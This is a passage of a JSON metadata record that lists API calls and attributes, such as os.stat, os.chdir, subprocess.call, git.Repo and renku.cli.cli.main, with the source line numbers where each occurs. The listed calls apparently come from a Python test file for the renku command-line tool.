"os.path", "line_number": 438, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 439, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 440, "usage_type": "call"}, {"api_name": "os.path", "line_number": 440, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 446, "usage_type": "call"}, {"api_name": "os.path", "line_number": 446, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 449, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 449, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 451, "usage_type": "call"}, {"api_name": "git.Repo.init", "line_number": 453, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 453, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 473, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 473, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 483, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 483, "usage_type": "call"}, {"api_name": "os.path", "line_number": 483, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 484, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 485, "usage_type": "call"}, {"api_name": "os.path", "line_number": 485, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 490, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 490, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 497, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 498, "usage_type": "call"}, {"api_name": "os.path", "line_number": 498, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 500, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 501, "usage_type": "call"}, {"api_name": "os.path", "line_number": 501, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 509, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 510, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 511, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 511, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 514, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 514, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 524, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 525, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 530, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 532, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 532, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 536, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 538, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 538, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 542, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 544, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 544, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 548, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 550, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 550, "usage_type": "name"}, {"api_name": "contextlib.redirect_stdout", "line_number": 557, "usage_type": "call"}, {"api_name": "renku.cli.cli.main", "line_number": 559, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 559, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 559, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 561, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 561, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 566, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 566, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 570, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 574, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 576, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 577, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 578, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 580, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 580, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 587, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 587, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 591, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 591, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 600, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 601, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 603, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 603, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 603, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 607, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 612, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 613, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 615, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 615, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 615, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 620, "usage_type": "attribute"}, {"api_name": "renku._compat.Path", "line_number": 625, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 629, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 645, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 645, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 655, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 655, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 676, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 676, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 681, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 681, "usage_type": "name"}, {"api_name": "renku._compat.Path", "line_number": 693, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 697, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 697, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 701, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 701, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 709, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 709, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 713, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 713, "usage_type": "name"}, {"api_name": "renku._compat.Path", "line_number": 720, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 726, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 747, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 747, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 748, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 748, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 750, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 750, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 750, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 752, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 752, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 757, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 757, "usage_type": "attribute"}, {"api_name": "renku._compat.Path", "line_number": 800, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 804, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 821, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 821, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 822, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 822, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 824, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 824, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 824, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 826, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 826, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 831, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 831, "usage_type": "attribute"}, {"api_name": "renku._compat.Path", "line_number": 862, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 878, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 879, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 881, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 881, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 881, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 883, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 883, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 888, "usage_type": "attribute"}]}